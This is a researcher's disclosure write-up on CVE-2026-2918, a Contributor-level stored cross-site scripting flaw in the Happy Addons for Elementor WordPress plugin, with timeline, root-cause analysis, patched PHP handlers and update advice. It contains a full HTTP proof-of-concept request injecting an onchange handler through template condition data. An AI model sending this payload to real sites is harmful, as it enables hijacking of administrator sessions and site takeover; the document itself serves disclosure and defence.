CVE-2026-2918 affects Happy Addons for Elementor. It is an authenticated, Contributor-level stored cross-site scripting vulnerability in the Theme Builder Template Conditions workflow. The vulnerable AJAX action accepts an arbitrary template_id and performs a broad edit_posts capability check instead of checking edit rights on the specific ha_library template. A Contributor with access to the Elementor editor nonce can change the conditions of another user's published template and store crafted condition data that is later rendered as unescaped HTML attributes in the Elementor editor. When an administrator opens Template Conditions, the payload can run in the admin browser context, which can lead to nonce theft, privileged actions, and full site compromise.

CVE: CVE-2026-2918
Plugin Version: Happy Addons for Elementor <= 3.21.0, fixed in 3.21.1
All Time: 13 492 791
Active installations: 400 000+
Publicly Published: March 10, 2026
Last Updated: March 11, 2026
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
Reference: https://www.cve.org/CVERecord?id=CVE-2026-2918
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/happy-elementor-addons/happy-addons-for-elementor-3210-insecure-direct-object-reference-to-authenticated-contributor-stored-cross-site-scripting-via-template-conditions

Timeline

February 13, 2026: Plugin testing and vulnerability detection in Happy Addons for Elementor were completed
February 13, 2026: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing it
March 10, 2026: Registered CVE-2026-2918

Discovery of the Vulnerability

The vulnerable surface is the ha_condition_update AJAX action used by the Theme Builder Template Conditions panel. In the affected versions, the request accepts template_id and writes the submitted conditions to the _ha_display_cond metadata of that template. The security boundary fails because the handler checks current_user_can('edit_posts', $template_id), which only confirms a broad role capability and does not verify whether the current user may edit the target ha_library post.

The read side of the workflow also weakens the boundary. The action that returns the rendered conditions HTML has its authorization gate disabled, so the editor workflow can return condition markup without the object-level access check that should protect a template. Once the stored condition is read back, the renderer places attacker-controlled condition segments into HTML attributes without the escaping required for an attribute context. That combination turns an unauthorized template condition update into stored JavaScript execution inside Elementor.

Understanding of Stored XSS attacks

Stored XSS in WordPress is dangerous because the attacker only needs to place the payload once. The vulnerable plugin saves attacker-supplied data in the database and later serves it to a trusted user. In an editor screen, that trusted user is often a site owner or administrator with active WordPress cookies and valid nonces in the browser. If the plugin renders stored condition data as HTML attributes instead of text, the browser treats the payload as part of the page and can execute an event handler in the administrator context.

Template builders are especially sensitive because they are usually opened by privileged users and they handle site-wide layout rules. Access checks for AJAX actions in these workflows must be tied to the exact template object. A general role capability such as edit_posts is not enough when the request includes a template_id that can point to another user's published template.

Exploiting the Stored XSS Vulnerability

To exploit CVE-2026-2918, an authenticated Contributor-level attacker can send a crafted condition update after obtaining a valid Elementor editor nonce:

POC:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=576&action=elementor
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Cookie: Contributor+

action=ha_condition_update&nonce=HappyAddonsEditor.editor_nonce&template_id=594&template_type=header&conds[]=include/singular/post/1"+onchange="alert(document.domain)"+x="'


The request stores a condition value that breaks out of the expected attribute value and adds an onchange handler. When an administrator later opens the Template Conditions panel for the affected template, the plugin renders the saved condition HTML in the editor. The browser parses the injected handler as markup in the admin page, so JavaScript runs with the administrator session available to the page.

The demonstration payload uses alert(document.domain) only to confirm code execution. In a real attack, the same execution context could be used to read editor nonces and submit privileged WordPress requests allowed to the administrator.

Recommendations for Improved Security

Site owners should update Happy Addons for Elementor to version 3.21.1 or a newer patched version. The current wordpress.org release is 3.22.0, so updating to the latest available build is the safest operational choice. Sites that allow Contributor accounts should treat Elementor editor access as sensitive until the update is applied.

Developers should use object-level capability checks for every AJAX action that modifies template data. For this workflow, the update handler should validate the nonce, verify the template type, and call current_user_can('edit_post', $template_id) before changing _ha_display_cond. Read endpoints that return rendered editor HTML should enforce the same authorization boundary.
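As an added example, not the plugin's own code, here is a hardened version of the update and read handlers described above. The action name ha_condition_update, the post type ha_library and the meta key _ha_display_cond come from this advisory; the nonce action string, the render action name, the condition format regex and all function names are assumptions.

```php
<?php
add_action( 'wp_ajax_ha_condition_update', 'example_ha_condition_update' );

// Shared gate: nonce, post type and an object-level capability check.
// 'edit_post' resolves through map_meta_cap() to edit_others_posts /
// edit_published_posts for THIS post, so a Contributor is refused on
// another user's published template. Nonce action name is an assumption.
function example_ha_template_gate() {
    check_ajax_referer( 'example_ha_editor_nonce', 'nonce' );
    $template_id = isset( $_POST['template_id'] ) ? absint( $_POST['template_id'] ) : 0;
    if ( ! $template_id
        || 'ha_library' !== get_post_type( $template_id )
        || ! current_user_can( 'edit_post', $template_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    return $template_id;
}

function example_ha_condition_update() {
    $template_id = example_ha_template_gate();
    // Input validation: keep only well-formed segments such as
    // include/singular/post/1 (format is an assumption), so quote or
    // angle-bracket characters never reach the database.
    $raw   = isset( $_POST['conds'] ) ? (array) wp_unslash( $_POST['conds'] ) : array();
    $conds = array();
    foreach ( $raw as $cond ) {
        $cond = sanitize_text_field( $cond );
        if ( preg_match( '#^(include|exclude)(/[a-z0-9_-]+)+$#', $cond ) ) {
            $conds[] = $cond;
        }
    }
    update_post_meta( $template_id, '_ha_display_cond', $conds );
    wp_send_json_success( $conds );
}

// Read side (action name is hypothetical): same gate, and every stored
// value is escaped for the attribute context before it is sent back.
add_action( 'wp_ajax_ha_condition_render', 'example_ha_condition_render' );

function example_ha_condition_render() {
    $template_id = example_ha_template_gate();
    $html        = '';
    foreach ( array_filter( (array) get_post_meta( $template_id, '_ha_display_cond', true ) ) as $cond ) {
        // esc_attr() encodes " as &quot;, so a stored value cannot close
        // the attribute and start an event handler.
        $html .= sprintf( '<input type="hidden" name="conds[]" value="%s">', esc_attr( $cond ) );
    }
    wp_send_json_success( $html );
}
```

With this gate in place, the request shown in the PoC is rejected with a 403 before any metadata is written, and even legacy values already stored in _ha_display_cond are rendered as inert attribute text.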

By taking proactive measures to address Stored XSS like CVE-2026-2918, WordPress website owners can reduce the risk created by unsafe template condition rendering and protect administrator sessions from client side compromise. Stay vigilant, stay secure.

#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #MediumVulnerability

